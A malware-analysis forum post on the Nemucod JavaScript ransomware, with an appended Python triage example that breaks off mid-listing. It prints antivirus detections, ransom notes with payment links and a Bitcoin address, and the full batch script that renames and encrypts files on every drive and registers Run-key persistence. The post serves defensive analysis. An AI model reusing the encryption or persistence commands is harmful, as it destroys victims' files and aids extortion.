Nemucod Ransomware (Crypto-Ransomware)

Ransomware-type malware
Malekal_morte
Posts: 116656
Joined: 10 Sept. 2005 13:57

by Malekal_morte »

Discovered on 17 March by dvk01uk, this crypto-ransomware (file-encrypting ransomware) essentially targets Windows operating systems. It is distributed through malicious emails carrying a malicious JavaScript attachment, hence our recommendation to block Windows Script Host: How to protect yourself from malicious scripts on Windows

So this is a JavaScript ransomware.

SHA256: 284cdca92a622afba59c6ee35a61871700e1dc8af63b1211e7e2e3ea2d0b83a1
File name: 00000594685.doc.js
Detection ratio: 12 / 57
Analysis date: 2016-03-13 09:50:12 UTC (3 days, 21 hours ago)

Antivirus Result Update
AhnLab-V3 JS/Nemucod 20160312
Arcabit HEUR.JS.Trojan.b 20160313
Cyren JS/Nemucod.D2!Eldorado 20160313
DrWeb SCRIPT.Virus 20160313
ESET-NOD32 JS/TrojanDownloader.Nemucod.IP 20160312
F-Prot JS/Nemucod.D2!Eldorado 20160313
Fortinet JS/Nemucod.IP!tr.dldr 20160313
Kaspersky HEUR:Exploit.Script.Generic 20160313
McAfee JS/Nemucod.dz 20160313
McAfee-GW-Edition JS/Nemucod.dz 20160312
Microsoft TrojanDownloader:JS/Swabfex.A 20160313
NANO-Antivirus Trojan.Script.ExpKit.easstb 20160313


This ransomware is distributed together with trojans, notably the Kovter trojan, a fileless malware.
A full disinfection and a change of your passwords are necessary.

The page containing the payment instructions is named Decrypt.htm

Attention!
All your documents, photos, databases and other important personal files
were encrypted using strong RSA-1024 algorithm with a unique key.

Nobody can help you except us. It is useless to reinstall Windows,
use antiviruses, rename files, etc.

To unlock your files you have to make payment.

Please click one of the following links for details:

http://david.guiron.perso.sfr.fr/payment/ 
http://nueva.alite.eu/payment/ 
http://mkgy-becs.at/payment/ 
http://antalyadunyamevdeneve.com/payment/ 
http://scanf.noahsofts.com/payment/ 
or this variant:

ATTENTION!

All your documents, photos, databases and other important personal files
were encrypted using strong RSA-1024 algorithm with a unique key.
To restore your files you have to pay 0.26544 BTC (bitcoins).
Please follow this manual:

1. Create Bitcoin wallet here:

      https://blockchain.info/wallet/new

2. Buy 0.26544 BTC with cash, using search here:

      https://localbitcoins.com/buy_bitcoins

3. Send 0.26544 BTC to this Bitcoin address:

      15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ

4. Open one of the following links in your browser to download decryptor:

      http://evakuator-lska.com.ua/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://rpexpress.qc.ca/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://omergoksel.com/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://web.benzol.net.pl/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://cspfc.immo.perso.sfr.fr/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ

5. Run decryptor to restore your files.

PLEASE REMEMBER:

      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
      - Nobody can help you except us.
      - It`s useless to reinstall Windows, update antivirus software, etc.
      - Your files can be decrypted only after you make payment.
      - You can find this manual on your desktop (DECRYPT.txt).

Encrypted files carry the .crypted extension

https://www.majorhector.com/offres/A87FF679/paiement.php

Document encryption is carried out through a .cmd file.
It searches for files, renames them to .crypted and then encrypts the documents.

dir /B "C:\" && for /r "C:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "D:\" && for /r "D:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "E:\" && for /r "E:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "F:\" && for /r "F:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "G:\" && for /r "G:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "H:\" && for /r "H:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "I:\" && for /r "I:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "J:\" && for /r "J:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "K:\" && for /r "K:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "L:\" && for /r "L:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "M:\" && for /r "M:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "N:\" && for /r "N:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "O:\" && for /r "O:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "P:\" && for /r "P:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Q:\" && for /r "Q:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "R:\" && for /r "R:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "S:\" && for /r "S:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "T:\" && for /r "T:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "U:\" && for /r "U:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "V:\" && for /r "V:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "W:\" && for /r "W:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "X:\" && for /r "X:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Y:\" && for /r "Y:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Z:\" && for /r "Z:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt"
REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt\""
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "%AppData%\Desktop\DECRYPT.txt"
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "%UserProfile%\Desktop\DECRYPT.txt"
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe"
del "C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe"
del "C:\Users\VINCEN~1\AppData\Local\Temp\848371.cmd" & notepad.exe "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt"
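As an added example (not code from this post or from malekal.com), here is a small Python triage script that parses a batch file of the shape shown above and extracts what a responder needs from it: the drives and extensions it targets, the rename suffix, the payload path, the Run-key persistence and file association it registers, and where it drops the ransom note. It runs on a constructed, shortened excerpt of the script (one drive loop instead of 26, six extensions instead of 79); the host file listing it is matched against is also constructed. The regular expressions, function names and the sample data are this example's own assumptions.

```python
"""Static triage of a Nemucod-style .cmd encryption script.

Added example, not code from the page or from malekal.com. It parses a
constructed, shortened excerpt of the batch file (same structure as the
one on the page: one drive loop, six extensions) and derives host
indicators from it, then matches them against a constructed file listing.
"""
import re

# Constructed excerpt modelled on the script on the page (not the original file).
SAMPLE_CMD = r'''dir /B "C:\" && for /r "C:\" %%i in (*.zip *.doc *.docx *.pdf *.jpg *.vmdk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt"
REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt\""
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "%UserProfile%\Desktop\DECRYPT.txt"
del "C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe"
'''

# for /r "<drive>" %%i in (<globs>) do (REN "%%i" "%%~nxi<suffix>" & call <payload> ...
FOR_RE = re.compile(
    r'for /r "([A-Z]:\\)" %%i in \(([^)]*)\) do \(REN "%%i" "%%~nxi(\.\w+)"'
    r'(?: & call (\S+))?'
)
# REG ADD "<key>" (/V "<name>" | /ve) /t <type> /F /D "<data, may contain \" escapes>"
REG_RE = re.compile(
    r'REG ADD "([^"]+)" (?:/V "([^"]+)"|(/ve)) /t (\w+) /F /D "((?:[^"\\]|\\.)*)"'
)
COPY_RE = re.compile(r'copy /y "([^"]+)" "([^"]+)"')
DEL_RE = re.compile(r'del "([^"]+)"')


def triage(script):
    """Summarise the script: targeted drives and extensions, rename suffix,
    payload path, registry changes, ransom-note drop paths, deleted files."""
    drives, exts, suffix, payload = [], set(), None, None
    for drive, globs, sfx, exe in FOR_RE.findall(script):
        drives.append(drive)
        exts.update(g[2:].lower() for g in globs.split() if g.startswith("*."))
        suffix = sfx
        payload = exe or payload
    registry = [
        {"key": key, "name": name or "(default)", "type": typ, "data": data}
        for key, name, _ve, typ, data in REG_RE.findall(script)
    ]
    return {
        "drives": drives,
        "extensions": sorted(exts),
        "rename_suffix": suffix,
        "payload": payload,
        "registry": registry,
        # Run-key entries are the persistence indicators to hunt for.
        "persistence": [r for r in registry if r["key"].upper().endswith("\\RUN")],
        # The note is copied to the desktop (the real script also copies it
        # over the payload before deleting it; only .txt destinations are kept).
        "note_paths": [dst for _src, dst in COPY_RE.findall(script)
                       if dst.lower().endswith(".txt")],
        "deleted": DEL_RE.findall(script),
    }


def flag_renamed_files(paths, summary):
    """Return paths of the form <stem>.<targeted ext><rename suffix>.

    Only files whose inner extension is on the script's target list are
    reported, so a stray name ending in the suffix does not trigger alone."""
    suffix = summary["rename_suffix"].lower()
    targeted = set(summary["extensions"])
    hits = []
    for p in paths:
        name = p.rsplit("\\", 1)[-1].lower()
        if not name.endswith(suffix):
            continue
        parts = name[: -len(suffix)].rsplit(".", 1)
        if len(parts) == 2 and parts[1] in targeted:
            hits.append(p)
    return hits


# Constructed host file listing for the demonstration.
SAMPLE_HOST_FILES = [
    r"C:\Users\user\Documents\budget.docx.crypted",
    r"C:\Users\user\Pictures\IMG_0001.jpg.crypted",
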